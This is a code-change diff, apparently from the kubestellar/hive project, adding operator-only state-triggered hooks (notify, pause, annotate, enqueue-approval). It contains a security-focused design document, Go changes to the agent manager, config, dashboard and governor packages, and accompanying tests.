+The clearest symptom is [#3836](https://github.com/kubestellar/hive/issues/3836)'s upgrade-pause switch, whose own file header has to warn that the pause must be honoured by every delivery path *or it is a lie*. Hooks are where the next such switch gets **declared** instead of threaded by hand through every call site.
+
+## Security model
+
+Hooks are, by construction, a "run something when state changes" surface. The security posture matters more than the mechanism, so it is worth stating plainly what a hook can and cannot do.
+
+### Registration is operator-only, config-as-code
+
+Hook definitions live in the PVC-backed running config next to everything else. Writing them requires **exactly the same authz as any other config write**, and carries the same layer provenance — each hook shows up in `GET /api/config/provenance` as `hooks.<name>`, so you can always see which layer declared it.
+
+There is **no runtime registration API**. Nothing agent-writable can reach the hook list. This is enforced structurally, not by a permission check that could be mounted on the wrong route: `pkg/hooks` exports no `Register`/`AddHook`/`InstallHook` function at all, and a test asserts that it never grows one. An agent that could register hooks on its own transitions would have an escalation path, so the capability simply does not exist.
+
+### Observe and notify freely; mutate only through audited APIs
+
+A hook may read transition payloads and send notifications without restriction. But **no action writes state directly** — not `hive-state.json`, not the registry, not any ledger. Mutating actions call the same audited entry points the dashboard uses:
+
+| Action | Reaches the system through |
+| --- | --- |
+| `notify` | the existing ntfy/Slack/Discord fanout (`pkg/notify`) |
+| `pause` | the **audited** agent-manager pause — the same call the dashboard's pause button makes |
+| `annotate` | the existing lifecycle timeline (`pkg/timeline`) |
+| `enqueue-approval` | the tool-approval queue ([#4000](https://github.com/kubestellar/hive/issues/4000)) |
+
+Those four interfaces are the *complete* mutation surface of the feature. A dispatcher with no sinks wired can do nothing at all — there is no fallback path that writes directly.
+
+The `pause` sink deliberately offers **no resume**. A hook may stop work; restarting it is a human decision.
+
+### Why there is no `exec`
+
+The action vocabulary is a **closed, vetted set**: `notify`, `pause`, `annotate`, `enqueue-approval`. There is deliberately no `exec`, `script`, `shell`, or `webhook` action.
+
+Arbitrary code execution on a state transition is a fundamentally different security problem — it needs a sandbox story, a credential-isolation story, and a resource-bounding story, none of which this slice has. Shipping `exec` "just for trusted operators" would mean any config-write escalation becomes remote code execution.
+
+This is enforced three ways so it cannot regress quietly:
+
+1. Validation rejects any action outside the vetted set, naming the allowed set in the error.
+2. A test asserts the action set is exactly those four, and that every plausible spelling of code execution (`exec`, `bash`, `eval`, `webhook`, …) is refused.
+3. A test parses the package's own imports and fails if `pkg/hooks` ever imports `os/exec`, `syscall`, `plugin`, `net/http/cgi`, or `text/template`. No future action can shell out without that test failing first.
+
+If exec-style hooks are ever wanted, they are a separate RFC with their own sandbox design.
+
+### Fail-closed everywhere
+
+An invalid hook list is **rejected in full** — hive does not skip the bad rule and arm the rest. Skipping would leave you with a hook you believe is armed and which silently never fires, which is the failure mode that makes declarative rule engines untrustworthy.
+
+Rejected at config-load time:
+
+- an unknown transition (the error lists the catalog)
+- an unknown action (the error lists the vetted set)
+- a `when:` predicate that does not parse, type-check, or return a bool
+- a predicate referencing a field that does not exist (so `t.agnet` is a load error, not a rule that never matches)
+- a duplicate hook name
+- a negative or over-maximum rate limit
+- a `notify` with an unknown priority
+- a `pause` on a transition that carries no agent, with no explicit `params.agent`
+
+At runtime, a predicate that errors or exceeds its cost budget is treated as **no-match**. A predicate hive cannot evaluate must never be able to trigger a pause.
+
+On a config reload, an invalid hook list logs an error and **keeps the previous hook set armed** rather than disarming working hooks.
+
+## Dispatcher guarantees
+
+**1. Hooks fire post-durable-commit, never inline.** An emitting site calls `Fire` only after the durable write succeeds, and `Fire` hands work to a background goroutine and returns immediately. A hook can never slow, block, or fail the transition that triggered it. (A hook fired before the persist could act on a transition that never durably happened — recent incident history says that is not hypothetical.)
+
+**2. Depth-1 causation guard.** A transition *caused by a hook* does not itself fire hooks.
+
+This matters because `pause` is both an action and a transition, so a hook on `agent_paused` whose action is `pause` feeds itself. Rate limiting alone does not fix that — it only slows the storm, and a slow infinite loop is still an infinite loop that fills the audit log. The guard is checked in `Fire`, the single entry point, so no emitter and no action can bypass it.
+
+Depth 1 rather than a configurable cap is deliberate: a configurable depth invites raising it, and the useful cases are all depth-0 → depth-1. Genuine multi-stage reactions should be expressed as multiple hooks on real transitions.
+
+**3. Per-hook rate limiting.** Every hook has a firings-per-minute ceiling (default 12, maximum 120). There is **no unlimited setting** — a flapping governor mode must not become a notification storm. The window survives config reloads, so a reload loop cannot be used to clear it. Suppressed firings are audited, not dropped silently.
+
+The window is *sliding and half-open*: the guarantee is "at most `limit` firings in any trailing 60 seconds", not "at most `limit` per calendar minute". A firing exactly 60 seconds after an earlier one does not count against it, so a burst at the boundary can produce `limit + 1` firings within a single 60-second span. Lowering a hook's limit takes effect immediately, and capacity returns as the existing firings age out.
+
+**The limit is consumed before `when:` is evaluated.** A transition that reaches the hook costs a slot even if the predicate then declines it — this is what stops a flapping transition from becoming a CEL-evaluation storm. The consequence to plan for: a hook with a *selective predicate on a noisy transition* can exhaust its quota without ever firing. If a hook seems not to fire despite a matching transition, check the audit log for `hook_rate_limited` and raise its `rate_limit_per_minute`.
+
+**4. Failure isolation.** Each hook runs independently behind its own recovered panic boundary and a 30-second timeout — enforced even for sinks whose call takes no context, so a wedged notification endpoint times out as a single failed hook instead of pinning a goroutine. One bad hook affects neither the transition nor any other hook. A hook whose sink is unwired reports a loud error per firing rather than silently doing nothing.
+
+**5. Every firing is audited.** Success, failure, rate-limit suppression, and depth suppression all land in `/data/audit.jsonl` alongside every other privileged action, as `hook_fired`, `hook_failed`, `hook_rate_limited`, and `hook_suppressed_depth`. Each entry names the responsible config rule. Where the transition carries model metadata, so does the audit entry — the audit log alone can answer "which model produced the rejected output".
+
+## Transition catalog
+
+| Transition | Fires when | Payload fields |
+| --- | --- | --- |
+| `governor_mode_change` | the governor commits a mode change | `from`, `to`, `reason` |
+| `agent_paused` | an agent's paused flag is durably set | `agent`, `trigger`, `reason` |
+| `agent_resumed` | an agent's paused flag is durably cleared | `agent`, `trigger`, `reason` |
+| `sweep_completed` | an auto-merge sweep records its result | `repo`, `reason`, `attrs.merged`, `attrs.skipped` |
+| `escalation_red` | escalation observes a red-CI state it reacts to | `repo`, `agent`, `reason`, `attrs.pr` |
+| `acmm_level_change` | the ACMM level changes via the audited path | `from`, `to`, `actor` |
+| `upgrade_pause` | the #3836 upgrade kill switch flips (`to` is `on`/`off`) | `to`, `actor`, `reason` |
+| `review_rejected` | a human rejects a review's output as low quality | `agent`, `repo`, `actor`, `reason`, `model`, `backend`, `pin`, `acmm_level`, `attrs.pr`, `attrs.model_knob_url` |
+
+For `agent_paused`/`agent_resumed`, `trigger` carries the `paused_trigger` provenance, so you can tell an operator pause from a governor pause from the login-detector's.
+
+A hook-driven pause records both halves of the #4055 provenance: `paused_trigger` is `hook:<hook-name>`, and `paused_by` is the same machine identity rather than empty or a fabricated user. A hook pause is therefore never anonymous in the fleet view — "paused, actor unknown" is precisely the state that proved indistinguishable from a malfunction — while still being unmistakably not a person.
+
+### Adding a transition
+
+Three steps, all in `src/pkg/hooks/transition.go` plus the emitting site:
+
+1. Declare a `Transition` constant.
+2. Add a `catalogEntry` (name, doc, payload fields it populates).
+3. Call `Dispatcher.Fire` at the emitting site, **after** the durable commit.
+
+Nothing else changes — the registry, predicates, and every action work off the generic `Payload`. `installGovernorModeChangeEmitter` in `cmd/hive/hookwire.go` is the worked example: it uses an observer the governor invokes after committing *and* after releasing its mutex, which is how you emit post-commit without holding a lock across third-party work.
+
+**If the transition can also be produced by a hook action, the emitter must carry the causation.** `pause` is the case that exists today: a hook that pauses an agent feeds `agent_paused` straight back into the hooks that triggered it. The pause action passes `cause.Child(hookName, transition)` through the audited pause API, and the `agent_paused` emitter carries that structured cause because the depth-1 guard reads *only* `Payload.Causation`. The `paused_trigger` provenance string (`hook:<name>`) is for humans reading the audit log — do not try to reconstruct the depth by parsing it.
+
+## Action reference
+
+### `notify`
+
+Sends through the configured ntfy/Slack/Discord fanout.
+
+| Param | Meaning |
+| --- | --- |
+| `title` | override the default title |
+| `message` | override the default body |
+| `priority` | `high`, `default`, or `low` |
+
+The default body is transition-aware; for `review_rejected` it leads with the producing model and its knob link.
+
+### `pause`
+
+Pauses an agent through the audited pause API.
+
+| Param | Meaning |
+| --- | --- |
+| `agent` | agent to pause; defaults to the transition's agent |
+| `reason` | recorded on the pause; defaults to naming the hook |
+
+### `annotate`
+
+Records an entry on the lifecycle timeline.
+
+| Param | Meaning |
+| --- | --- |
+| `note` | the annotation text |
+| `issue_ref` | issue to attach to; defaults to `attrs.issue_ref` |
+
+Model/backend/pin are carried into the timeline attrs when the transition has them.
+
+### `enqueue-approval`
+
+Places a request on the [#4000](https://github.com/kubestellar/hive/issues/4000) tool-approval queue.
+
+| Param | Meaning |
+| --- | --- |
+| `kind` | approval category; defaults to the transition name |
+| `summary` | the ask shown in the approvals UI |
+| `agent`, `repo` | scope; default to the transition's values |
+
+**Status:** the queue interface is defined and consumed, but the backing queue lands with #4000. Until then an `enqueue-approval` hook reports a wiring failure per firing (visible in the audit log) rather than silently dropping the request.
+
+## Predicates (`when:`)
+
+An optional CEL expression, evaluated against the transition payload bound to `t`. Empty means "always fire". It uses the same engine and the same fail-closed posture as `triggers:` (`pkg/celtrigger`).
+
+```yaml
+hooks:
+  - name: pause-reviewer-on-repeated-rejects
+    on: review_rejected
+    action: pause
+    when: t.agent == "reviewer" && t.pin != ""
+    params:
+      reason: repeated low-quality output on a stale pin
+```
+
+Available fields: `t.transition`, `t.from`, `t.to`, `t.agent`, `t.repo`, `t.actor`, `t.trigger`, `t.reason`, `t.model`, `t.backend`, `t.pin`, `t.acmm_level`, `t.attrs`.
+
+**Use `attr(t.attrs, "key")` to read attrs, not `t.attrs["key"]`.** CEL's native map index *raises* on an absent key, and since a raised error is treated as no-match, `t.attrs["pr"] != ""` would silently never fire for transitions that omit that attr. `attr()` returns `""` for a missing key instead.
+
+```yaml
+    when: attr(t.attrs, "pr") != ""
+```
+
+Referencing a field that does not exist is a **compile error at config load**, so typos surface immediately rather than becoming a rule that never matches.
+
+## Worked examples
+
+### Notify on a rejected review, with the model knob in the message
+
+The shipped default. Answers the fleet-owner ask: when output is bad, see the tuning knob *in that moment* rather than hunting the admin UI.
+
+```yaml
+hooks:
+  - name: review-rejected-notify
+    on: review_rejected
+    action: notify
+    params:
+      priority: high
+```
+
+Produces:
+
+```
+[hive-prod] Review rejected: reviewer
+kubestellar/hive#4001 review rejected by fleet-owner.
+Reason: hallucinated the API surface
+Produced by anthropic/claude-opus-4 (pin: 20240229)
+Adjust the model pin: https://hive.example.com/agents?agent=reviewer&focus=model
+```
+
+### Alert only on the governor entering surge
+
+```yaml
+hooks:
+  - name: surge-alert
+    on: governor_mode_change
+    action: notify
+    when: t.to == "surge"
+    params:
+      priority: high
+      title: Governor entered surge
+```
+
+### Annotate the timeline whenever the upgrade kill switch flips
+
+```yaml
+hooks:
+  - name: record-upgrade-pause
+    on: upgrade_pause
+    action: annotate
+    params:
+      note: upgrade delivery kill switch flipped
+```
+
+### Require approval for a large ACMM jump
+
+```yaml
+hooks:
+  - name: gate-high-autonomy
+    on: acmm_level_change
+    action: enqueue-approval
+    when: t.to == "5" || t.to == "6"
+    params:
+      kind: acmm-raise
+      summary: Confirm raising fleet autonomy to L5+
+```
+
+### Rate-limit a chatty hook explicitly
+
+```yaml
+hooks:
+  - name: sweep-summary
+    on: sweep_completed
+    action: notify
+    rate_limit_per_minute: 2
+    params:
+      priority: low
+```
+
+## Operational notes
+
+- **Hot reload.** Hooks recompile on config reload, only when the list actually changed. The registry swaps inside the existing dispatcher so rate-limit windows survive.
+- **Default off.** No `hooks:` block means no hooks fire and behavior is byte-identical to before. An empty registry costs one map lookup per transition.
+- **Bounded.** At most 100 hooks; each predicate has a bounded CEL cost budget; each action has a 30-second timeout.
+- **Diagnosing a hook that is not firing.** Check, in order: hive logs at startup/reload for a rejection (`hooks: rejecting invalid hook config`); the audit log for `hook_rate_limited` or `hook_suppressed_depth`; whether the `when:` predicate matches (a warning is logged when one fails to evaluate); and whether the transition is hook-caused, in which case the depth-1 guard suppressed it by design.

--- a/src/pkg/agent/manager.go
+++ b/src/pkg/agent/manager.go
@@ -395,6 +395,25 @@ func (p ProjectContext) PrimaryRepo() string {
 	return ""
 }
 
+// PauseCausation is hook causation metadata carried in agent pause/resume
+// events without making pkg/agent import pkg/hooks.
+type PauseCausation struct {
+	Depth            int
+	HookName         string
+	OriginTransition string
+}
+
+// PauseTransitionEvent describes a durable agent pause/resume transition.
+type PauseTransitionEvent struct {
+	Agent     string
+	Paused    bool
+	Trigger   string
+	Reason    string
+	By        string
+	Causation PauseCausation
+	At        time.Time
+}
+
 type Manager struct {
 	agents   map[string]*AgentProcess
 	idToName map[string]string
@@ -489,6 +508,7 @@ type Manager struct {
 	// m.mu (heartbeat AllStatuses, SendKick, terminal ResolveAgent) — the
 	// same failure class as the mint-issuer deadlock fixed in ca5f0f00.
 	persistPauseCallback func(name string, paused bool)
+	pauseObserver        atomic.Pointer[func(PauseTransitionEvent)]
 
 	// breakerEngaged and breakerPaused hold the fleet-breaker's state, guarded
 	// by m.mu. When an operator throws the breaker, EngageBreaker pauses every
@@ -549,6 +569,25 @@ func (m *Manager) SetPersistPauseCallback(fn func(name string, paused bool)) {
 	m.mu.Lock()
 	m.persistPauseCallback = fn
 	m.mu.Unlock()
+}
+
+// SetPauseTransitionObserver wires a post-persistence observer for agent
+// pause/resume transitions. The observer runs asynchronously.
+func (m *Manager) SetPauseTransitionObserver(fn func(PauseTransitionEvent)) {
+	if fn == nil {
+		m.pauseObserver.Store(nil)
+		return
+	}
+	m.pauseObserver.Store(&fn)
+}
+
+func (m *Manager) emitPauseTransition(event PauseTransitionEvent) {
+	if event.At.IsZero() {
+		event.At = time.Now()
+	}
+	if fn := m.pauseObserver.Load(); fn != nil && *fn != nil {
+		go (*fn)(event)
+	}
 }
 
 // SetRecordPromptCallback wires a function that persists a delivered kick
@@ -8462,6 +8501,12 @@ func (m *Manager) Pause(name, trigger, reason string) error {
 // user (the authenticated dashboard user for a dashboard-api pause); empty
 // means "no human actor" — never fabricate one.
 func (m *Manager) PauseBy(name, trigger, reason, by string) error {
+	return m.PauseByCause(name, trigger, reason, by, PauseCausation{})
+}
+
+// PauseByCause is PauseBy plus hook causation metadata for the post-commit
+// agent_paused emitter. Non-hook callers should use PauseBy/Pause.
+func (m *Manager) PauseByCause(name, trigger, reason, by string, cause PauseCausation) error {
 	m.mu.Lock()
 
 	agent, ok := m.agents[name]
@@ -8499,6 +8544,7 @@ func (m *Manager) PauseBy(name, trigger, reason, by string) error {
 		"backend", agent.Config.Backend,
 		"restart_count", agent.RestartCount,
 	)
+	pausedAt := agent.PausedAt
 	m.audit(AuditAgentPaused, name, auditFields(
 		"outcome", "success",
 		"backend", agent.effectiveBackend(),
@@ -8511,6 +8557,15 @@ func (m *Manager) PauseBy(name, trigger, reason, by string) error {
 	if persistPause != nil {
 		persistPause(name, true)
 	}
+	m.emitPauseTransition(PauseTransitionEvent{
+		Agent:     name,
+		Paused:    true,
+		Trigger:   trigger,
+		Reason:    reason,
+		By:        by,
+		Causation: cause,
+		At:        pausedAt,
+	})
 	return nil
 }
 
@@ -8547,6 +8602,12 @@ func (m *Manager) Resume(ctx context.Context, name, trigger, reason string) erro
 		// re-enter the manager, and m.mu is a non-reentrant RWMutex —
 		// invoking it here with the lock held deadlocks Resume and wedges
 		// everything queued behind m.mu (see persistPauseCallback docs).
+		defer m.emitPauseTransition(PauseTransitionEvent{
+			Agent:   name,
+			Paused:  false,
+			Trigger: trigger,
+			Reason:  reason,
+		})
 		defer persistPause(name, false)
 	}
 	agent.PausedAt = time.Time{}

--- a/src/pkg/agent/pause_provenance_test.go
+++ b/src/pkg/agent/pause_provenance_test.go
@@ -98,3 +98,42 @@ func TestSeedPauseState_ReplaysActor(t *testing.T) {
 		t.Errorf("PausedAt = %v, want %v", status.PausedAt, pausedAt)
 	}
 }
+
+func TestPauseByCauseEmitsPostPersistenceEvent(t *testing.T) {
+	m := provenanceTestManager(t)
+	persisted := make(chan bool, 1)
+	observed := make(chan PauseTransitionEvent, 1)
+	m.SetPersistPauseCallback(func(name string, paused bool) {
+		if name == "scanner" {
+			persisted <- paused
+		}
+	})
+	m.SetPauseTransitionObserver(func(event PauseTransitionEvent) {
+		observed <- event
+	})
+
+	cause := PauseCausation{Depth: 1, HookName: "pause-on-red", OriginTransition: "escalation_red"}
+	if err := m.PauseByCause("scanner", "hook:pause-on-red", "red CI", "hook:pause-on-red", cause); err != nil {
+		t.Fatalf("PauseByCause: %v", err)
+	}
+	select {
+	case paused := <-persisted:
+		if !paused {
+			t.Fatal("persist callback saw resume, want pause")
+		}
+	default:
+		t.Fatal("pause observer fired before or without persistence")
+	}
+
+	select {
+	case event := <-observed:
+		if !event.Paused || event.Agent != "scanner" || event.Trigger != "hook:pause-on-red" {
+			t.Fatalf("unexpected event: %+v", event)
+		}
+		if event.Causation != cause {
+			t.Fatalf("causation not preserved: got %+v want %+v", event.Causation, cause)
+		}
+	case <-time.After(time.Second):
+		t.Fatal("pause transition observer did not fire")
+	}
+}

--- a/src/pkg/config/config.go
+++ b/src/pkg/config/config.go
@@ -54,7 +54,17 @@ type Config struct {
 	Tracing OTelConfig `yaml:"tracing,omitempty"`
 	// Triggers is an additive list of CEL-based declarative agent triggers.
 	// Default empty → existing label/governor triggering is unchanged.
-	Triggers   []TriggerRule    `yaml:"triggers,omitempty" json:"triggers,omitempty"`
+	Triggers []TriggerRule `yaml:"triggers,omitempty" json:"triggers,omitempty"`
+	// Hooks is an additive list of operator-declared state-triggered hooks
+	// (RFC #4001): `on: <transition>` → `action: <vetted action>`. Default
+	// empty → no hooks fire and behavior is byte-identical to before.
+	//
+	// This list is OPERATOR-ONLY by construction: it is config, so writing it
+	// requires the same authz and carries the same layer provenance as any
+	// other config write, and there is deliberately no runtime registration
+	// API. Nothing agent-writable can reach it — an agent able to register
+	// hooks on its own transitions would have an escalation path.
+	Hooks      []HookRule       `yaml:"hooks,omitempty" json:"hooks,omitempty"`
 	Mint       MintConfig       `yaml:"mint,omitempty"`
 	Ioscan     IoscanConfig     `yaml:"ioscan,omitempty" json:"ioscan,omitempty"`
 	Classifier ClassifierConfig `yaml:"classifier,omitempty" json:"classifier,omitempty"`
@@ -163,6 +173,41 @@ type TriggerRule struct {
 	Expr     string `yaml:"expr" json:"expr"`
 	Agent    string `yaml:"agent" json:"agent"`
 	Priority int    `yaml:"priority,omitempty" json:"priority,omitempty"`
+}
+
+// HookRule is one operator-declared state-triggered hook (RFC #4001). When the
+// transition named by On durably commits — and the optional When predicate
+// matches — Action is performed with Params.
+//
+// The transition and action vocabularies are CLOSED sets owned by pkg/hooks,
+// and validation FAILS CLOSED: an unknown transition or action rejects the
+// whole hook list rather than skipping the rule, so an operator never ends up
+// with a hook they believe is armed and which silently never fires.
+//
+// There is deliberately no `exec`/`script` action. Hooks may observe and
+// notify freely, but every mutating action goes through an existing audited
+// API. Arbitrary code execution on a state transition is a separate RFC with
+// its own sandbox story.
+type HookRule struct {
+	// Name identifies the hook in logs and audit entries. Required, unique.
+	Name string `yaml:"name" json:"name"`
+	// On is the transition to attach to, e.g. "review_rejected". Must be in
+	// the pkg/hooks transition catalog.
+	On string `yaml:"on" json:"on"`
+	// Action is the vetted action: notify, pause, annotate, enqueue-approval.
+	Action string `yaml:"action" json:"action"`
+	// Params carries action-specific settings (notify's title/message/
+	// priority, pause's agent/reason, annotate's note, enqueue-approval's
+	// kind/summary).
+	Params map[string]string `yaml:"params,omitempty" json:"params,omitempty"`
+	// When is an optional CEL predicate over the transition payload, exposed
+	// as `t` (e.g. `t.agent == "reviewer"`). Empty means always fire. Compiled
+	// by the same fail-closed engine as `triggers:`.
+	When string `yaml:"when,omitempty" json:"when,omitempty"`
+	// RateLimitPerMinute caps firings of this hook. Zero uses the package
+	// default; there is no unlimited setting, so a flapping transition cannot
+	// become a notification storm.
+	RateLimitPerMinute int `yaml:"rate_limit_per_minute,omitempty" json:"rate_limit_per_minute,omitempty"`
 }
 
 // MintConfig configures the OIDC token mint service (pkg/mint). It is additive

--- a/src/pkg/config/provenance.go
+++ b/src/pkg/config/provenance.go
@@ -192,6 +192,18 @@ func enumerateFields(cfg *Config) []FieldOrigin {
 	for name := range cfg.Agents {
 		add("agents."+name, "configured")
 	}
+
+	// Hooks are a privileged surface: a hook can pause an agent or enqueue an
+	// approval, so WHICH LAYER declared one is security-relevant and must show
+	// up in the provenance report alongside every other operator field. Each
+	// hook is enumerated by name so the report answers "who registered this
+	// hook" per rule rather than only "hooks exist".
+	for _, h := range cfg.Hooks {
+		if h.Name == "" {
+			continue
+		}
+		add("hooks."+h.Name, h.On+" → "+h.Action)
+	}
 	return out
 }
 

--- a/src/pkg/dashboard/api_packs.go
+++ b/src/pkg/dashboard/api_packs.go
@@ -1,6 +1,7 @@
 package dashboard
 
 import (
+	"context"
 	"fmt"
 	"net/http"
 	"sort"
@@ -9,6 +10,7 @@ import (
 	"sync"
 
 	"github.com/kubestellar/hive/pkg/config"
+	"github.com/kubestellar/hive/pkg/hooks"
 )
 
 func (s *Server) handlePacksList(w http.ResponseWriter, r *http.Request) {
@@ -476,6 +478,7 @@ func (s *Server) handlePackSetLevel(w http.ResponseWriter, r *http.Request) {
 	defer s.levelMu.Unlock()
 
 	level := body.Level
+	prevLevel := detectACMMLevel(s.deps.Config)
 	s.deps.Config.ACMMLevel = &level
 	// Clear per-agent mode from the persisted config so the fsnotify watcher
 	// does not re-apply stale pack modes when it reloads the file. Without
@@ -565,6 +568,14 @@ func (s *Server) handlePackSetLevel(w http.ResponseWriter, r *http.Request) {
 		packUpdated = packResult.Updated
 	}
 	s.auditFromRequest(r, "set_acmm_level", auditDetail("level", strconv.Itoa(body.Level)), "")
+	if s.deps != nil && s.deps.HookFire != nil && prevLevel != level {
+		s.deps.HookFire(context.Background(), hooks.Payload{
+			Transition: hooks.TransitionACMMLevelChange,
+			From:       strconv.Itoa(prevLevel),
+			To:         strconv.Itoa(level),
+			Actor:      requestUser(r),
+		})
+	}
 	s.logger.Info("ACMM level set", "level", body.Level, "paused", len(paused), "resumed", len(resumed), "packUpdated", packUpdated)
 	jsonResponse(w, map[string]interface{}{
 		"ok":               true,

--- a/src/pkg/dashboard/deps.go
+++ b/src/pkg/dashboard/deps.go
@@ -14,6 +14,7 @@ import (
 	"github.com/kubestellar/hive/pkg/config"
 	ghpkg "github.com/kubestellar/hive/pkg/github"
 	"github.com/kubestellar/hive/pkg/governor"
+	"github.com/kubestellar/hive/pkg/hooks"
 	"github.com/kubestellar/hive/pkg/knowledge"
 	"github.com/kubestellar/hive/pkg/rotation"
 	"github.com/kubestellar/hive/pkg/scheduler"
@@ -89,6 +90,7 @@ type Dependencies struct {
 	// repo is tried in the same spelling the ledger keys on (the config repo
 	// form); a nil func means "no claim data" and disables the check.
 	IssueClaimed func(repo string, number int) (ghpkg.IssueClaim, bool)
+	HookFire     func(context.Context, hooks.Payload)
 }
 
 type NousState struct {

--- a/src/pkg/governor/governor.go
+++ b/src/pkg/governor/governor.go
@@ -223,6 +223,10 @@ type Governor struct {
 	// re-inversion is reported again.
 	lastLadderWarn ladderSnapshot
 
+	// modeChangeObserver is notified after a committed mode change, outside
+	// g.mu. See SetModeChangeObserver.
+	modeChangeObserver ModeChangeObserver
+
 	// resumeKicks records the last crash-recovery resume kick granted per
 	// agent (see AllowResumeKick). In-memory only: after a process restart
 	// the startup path re-kicks every eligible agent anyway, so persisting
@@ -284,7 +288,37 @@ func (g *Governor) UpdateAgents(agents map[string]config.AgentConfig) {
 	g.agents = agents
 }
 
+// ModeChangeObserver is notified after a mode change has been committed to the
+// governor's state. It is the emission point for the RFC #4001
+// governor_mode_change transition.
+//
+// It is invoked AFTER Evaluate releases g.mu, never inside it. Calling an
+// observer under the lock would re-enter the governor from any implementation
+// that reads governor state, and hive has already been bitten by exactly that
+// class of startup deadlock; it would also put third-party work on a critical
+// path holding a hot mutex.
+type ModeChangeObserver func(change ModeChange)
+
+// SetModeChangeObserver installs the post-commit mode-change observer. Safe to
+// leave unset: a nil observer makes the notification a no-op, which is what
+// tests and any non-hook embedding get.
+func (g *Governor) SetModeChangeObserver(obs ModeChangeObserver) {
+	g.mu.Lock()
+	defer g.mu.Unlock()
+	g.modeChangeObserver = obs
+}
+
 func (g *Governor) Evaluate(queueIssues, queuePRs, queueHold, slaViolations int) []string {
+	// pendingModeChange is captured under the lock and dispatched after it is
+	// released, so the observer never runs with g.mu held.
+	var pendingModeChange *ModeChange
+	var observer ModeChangeObserver
+	defer func() {
+		if pendingModeChange != nil && observer != nil {
+			observer(*pendingModeChange)
+		}
+	}()
+
 	g.mu.Lock()
 	defer g.mu.Unlock()
 
@@ -318,6 +352,11 @@ func (g *Governor) Evaluate(queueIssues, queuePRs, queueHold, slaViolations int)
 		}
 		g.appendModeHistory(change)
 		g.state.Mode = newMode
+		// Hand the committed change to the deferred dispatcher above, which
+		// runs it only after g.mu is released.
+		committed := change
+		pendingModeChange = &committed
+		observer = g.modeChangeObserver
 	}
 
 	g.updateCadences()

--- a/src/pkg/governor/mode_change_observer_test.go
+++ b/src/pkg/governor/mode_change_observer_test.go
@@ -1,0 +1,135 @@
+package governor
+
+import (
+	"io"
+	"log/slog"
+	"sync"
+	"testing"
+
+	"github.com/kubestellar/hive/pkg/config"
+)
+
+// These tests cover the ModeChangeObserver added for RFC #4001's
+// governor_mode_change transition. The properties that matter are that the
+// observer runs only for a COMMITTED change, and that it runs OUTSIDE g.mu —
+// hive has already been bitten by re-entrant-locking startup deadlocks, and an
+// observer that reads governor state is the obvious way to reintroduce one.
+
+func observerTestGovernor(t *testing.T) *Governor {
+	t.Helper()
+	return New(
+		config.GovernorConfig{
+			Modes: map[string]config.ModeConfig{
+				"quiet": {Threshold: 1},
+				"busy":  {Threshold: 5},
+				"surge": {Threshold: 10},
+			},
+		},
+		map[string]config.AgentConfig{},
+		slog.New(slog.NewTextHandler(io.Discard, nil)),
+	)
+}
+
+// TestModeChangeObserverFiresOnCommittedChange is the positive control: the
+// observer must actually be invoked, with the committed from/to.
+func TestModeChangeObserverFiresOnCommittedChange(t *testing.T) {
+	g := observerTestGovernor(t)
+
+	var mu sync.Mutex
+	var seen []ModeChange
+	g.SetModeChangeObserver(func(c ModeChange) {
+		mu.Lock()
+		defer mu.Unlock()
+		seen = append(seen, c)
+	})
+
+	// Drive the queue deep enough to leave idle.
+	g.Evaluate(20, 0, 0, 0)
+
+	mu.Lock()
+	defer mu.Unlock()
+	if len(seen) != 1 {
+		t.Fatalf("expected exactly 1 observed mode change, got %d", len(seen))
+	}
+	if seen[0].To == seen[0].From {
+		t.Errorf("observed a no-op change: %+v", seen[0])
+	}
+	if seen[0].To != ModeSurge {
+		t.Errorf("expected surge for a deep queue, got %q", seen[0].To)
+	}
+}
+
+// TestModeChangeObserverSilentWhenModeUnchanged: no transition, no firing.
+// Otherwise every eval cycle would emit, and a hook on this transition would
+// become a per-cycle notification storm.
+func TestModeChangeObserverSilentWhenModeUnchanged(t *testing.T) {
+	g := observerTestGovernor(t)
+
+	var mu sync.Mutex
+	count := 0
+	g.SetModeChangeObserver(func(ModeChange) {
+		mu.Lock()
+		defer mu.Unlock()
+		count++
+	})
+
+	// Same depth twice: one change, then nothing.
+	g.Evaluate(20, 0, 0, 0)
+	g.Evaluate(20, 0, 0, 0)
+	g.Evaluate(20, 0, 0, 0)
+
+	mu.Lock()
+	defer mu.Unlock()
+	if count != 1 {
+		t.Errorf("expected 1 firing across 3 evals at a constant depth, got %d", count)
+	}
+}
+
+// TestModeChangeObserverRunsOutsideTheGovernorLock is the deadlock regression.
+// The observer reads governor state (Mode()), which takes g.mu.RLock(). If the
+// observer were invoked while Evaluate still held g.mu, this test would
+// deadlock rather than fail — so it is run with a timeout by the test runner
+// and documents the invariant explicitly.
+func TestModeChangeObserverRunsOutsideTheGovernorLock(t *testing.T) {
+	g := observerTestGovernor(t)
+
+	var observedMode Mode
+	g.SetModeChangeObserver(func(c ModeChange) {
+		// Re-entering the governor from the observer MUST be safe.
+		observedMode = g.GetState().Mode
+	})
+
+	g.Evaluate(20, 0, 0, 0)
+
+	if observedMode != ModeSurge {
+		t.Errorf("observer should see the committed state, got %q", observedMode)
+	}
+}
+
+// TestModeChangeObserverSeesCommittedState: the observer must run AFTER the
+// state flip, not before, so a hook never acts on a transition the governor
+// then declines to make.
+func TestModeChangeObserverSeesCommittedState(t *testing.T) {
+	g := observerTestGovernor(t)
+
+	var stateAtFire Mode
+	g.SetModeChangeObserver(func(c ModeChange) {
+		stateAtFire = g.GetState().Mode
+	})
+
+	g.Evaluate(20, 0, 0, 0)
+
+	if stateAtFire != ModeSurge {
+		t.Errorf("observer ran before the commit: governor mode was %q at fire time", stateAtFire)
+	}
+}
+
+func TestNilModeChangeObserverIsSafe(t *testing.T) {
+	g := observerTestGovernor(t)
+	// No observer installed: must not panic.
+	g.Evaluate(20, 0, 0, 0)
+
+	// Explicitly nil, too.
+	g.SetModeChangeObserver(nil)
+	g.Evaluate(0, 0, 0, 0)
+}

--- a/src/pkg/hooks/action.go
+++ b/src/pkg/hooks/action.go
@@ -1,0 +1,302 @@
+package hooks
+
+import (
+	"context"
+	"fmt"
+	"sort"
+	"strings"
+)
+
+// Action names the vetted operation a hook performs. The set is CLOSED and
+// small by design (RFC #4001 security position): an operator can observe and
+// notify freely, but every mutating action goes through an existing audited
+// API, and there is deliberately no exec/script action in this slice.
+//
+// Adding an action is a security review, not a config change: it means adding
+// a constant here, a vetted implementation, and a validation rule. An unknown
+// action in config is rejected at load time.
+type Action string
+
+const (
+	// ActionNotify sends a notification through the existing ntfy/Slack/Discord
+	// fanout (pkg/notify). Pure observation — zero mutation risk. This is the
+	// action the first shipped hook uses.
